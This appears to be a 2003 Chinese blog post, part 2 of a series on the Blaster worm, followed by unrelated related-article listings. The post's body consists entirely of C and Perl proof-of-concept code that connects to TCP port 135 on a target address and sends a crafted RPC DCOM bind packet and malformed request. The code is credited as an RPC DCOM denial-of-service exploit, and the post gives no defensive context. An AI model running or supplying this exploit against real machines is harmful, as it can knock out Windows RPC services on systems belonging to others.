冲击波病毒内幕点滴(2)

原创 2003年09月10日 11:03:00

1<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

测试代码

#include

#include

#include

#include

#include

#include

 

unsigned char bindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,

0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

 

unsigned char request[]={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,

0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,

0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

 

 

 

void main(int argc,char ** argv)

{

WSADATA WSAData;

int i;

SOCKET sock;

SOCKADDR_IN addr_in;

 

short port=135;

unsigned char buf1[0x1000];

printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org/n");

printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org/n");

printf("Welcome to http://www.xfocus.net/n");

if(argc<2)

{

printf("useage:%s target/n",argv[0]);

exit(1);

}

 

 

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)

{

printf("WSAStartup error.Error:%d/n",WSAGetLastError());

return;

}

 

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(port);

addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

 

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

{

printf("Socket failed.Error:%d/n",WSAGetLastError());

return;

}

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)

{

printf("Connect failed.Error:%d",WSAGetLastError());

return;

}

if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d/n",WSAGetLastError());

return;

}

 

i=recv(sock,buf1,1024,MSG_PEEK);

if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d/n",WSAGetLastError());

return;

}

i=recv(sock,buf1,1024,MSG_PEEK);

}

 

 

#!/usr/bin/perl -w

# By SecurITeam's Experts

my $bindstr = "/x05/x00/x0B/x03/x10/x00/x00/x00/x48/x00/x00/x00/x7F/x00/x00/x00/xD0/x16/xD0/x16/x00/x00/x00/x00/x01/x00/x00/x00/x01/x00/x01/x00/xA0/x01/x00/x00/x00/x00/x00/x00/xC0/x00/x00/x00/x00/x00/x00/x46/x00/x00/x00/x00/x04/x5D/x88/x8A/xEB/x1C/xC9/x11/x9F/xE8/x08/x00/x2B/x10/x48/x60/x02/x00/x00/x00";

 

my $request = "/x05/x00/x00/x03/x10/x00/x00/x00/x48/x00/x00/x00/x13/x00/x00/x00/x90/x00/x00/x00/x01/x00/x03/x00/x05/x00/x06/x01/x00/x00/x00/x00/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x00/x00/x00/x00/x00/x00/x00/x00";

 

use Socket;

$proto = getprotobyname('tcp');

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems/n");

 

$IP = $ARGV[0];

$target = inet_aton($IP);

$paddr = sockaddr_in(135, $target);

connect(S, $paddr) || die "connect: $!";

select(S); $|=1;

print $bindstr;

sleep(2);

print $request;

sleep(2);

select(STDOUT);

close(S);

Spring技术内幕2

BeanFactory和ApplicationContext都可以看成是容器(IoC)的具体表现形式。 IoC容器的接口设计图 BeanDefinition BeanFactory接...
  • qq_29606255
  • qq_29606255
  • 2017年11月23日 23:06
  • 16

深入分析JavaWeb技术内幕(修订版)》【PDF】下载

《深入分析JavaWeb技术内幕(修订版)》【PDF】下载链接: https://u253469.pipipan.com/fs/253469-230062569    内容简介 《深入分析Java ...
  • zhiyong499
  • zhiyong499
  • 2017年12月03日 17:47
  • 166

MySQL技术内幕系列 电子书 作者: 姜承尧

下载地址
  • Cloud_Strife_1985
  • Cloud_Strife_1985
  • 2017年07月15日 17:30
  • 548

第38课:Kafka源码解读Producer工作机制内幕

第38课:Kafka源码解读Producer工作机制内幕 1 producer 代码实例 2 producer 源码揭密 kafka 动态元数据刷新,对发送者而言,分布式...
  • duan_zhihua
  • duan_zhihua
  • 2016年07月02日 06:57
  • 935

QT学习点滴记录(二)

示例名称:QtCreator添加菜单图标 1. x
  • wtf19900910
  • wtf19900910
  • 2014年09月19日 10:53
  • 294

我的第一本著作:Spark技术内幕上市!

现在各大网站销售中!京东:http://item.jd.com/11770787.html当当:http://product.dangdang.com/23776595.html亚马逊:http://...
  • anzhsoft2008
  • anzhsoft2008
  • 2015年09月20日 10:00
  • 51634

中了勒索病毒要怎么办

下面是昨天肝了一夜研究的成果 首先, 不要做的事: 1.删那些生成的加密文件, 原因:那些确实是你的文件啊,万一以后有大佬把加密算法破解了呢,留着不亏. 2.不要将你的电脑再次接上内网, ...
  • zhembrace
  • zhembrace
  • 2017年05月16日 10:58
  • 1314

COM技术内幕(笔记)

COM——到底是什么?——COM标准的要点介绍,它被设计用来解决什么问题?基本元素的定义——COM术语以及这些术语的含义。使用和处理COM对象——如何创建、使用和销毁COM对象。基本接口——描述IUn...
  • cometwo
  • cometwo
  • 2015年04月25日 16:37
  • 2486

常见手机病毒学习总结

常见的手机病毒有哪些种类 破坏系统、盗取账号、盗取网银等 手机病毒种类  手机病毒按病毒形式四类:  1.通红传送蓝牙设备传播病毒卡比尔、Lasco.A  ...
  • bcbobo21cn
  • bcbobo21cn
  • 2016年07月30日 11:13
  • 1338

勒索病毒工作原理

前些天借着Windows上的”永恒之蓝“漏洞,本来几乎快销声匿迹的加密勒索病毒又重新回到了公众视线里。由于电信等网络运营商早就封堵了可能导致中毒的445端口,所以外网影响不大,但是教育网里的同学就遭殃...
  • qmickecs
  • qmickecs
  • 2017年05月22日 13:48
  • 3088
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:冲击波病毒内幕点滴(2)
举报原因:
原因补充:

(最多只允许输入30个字)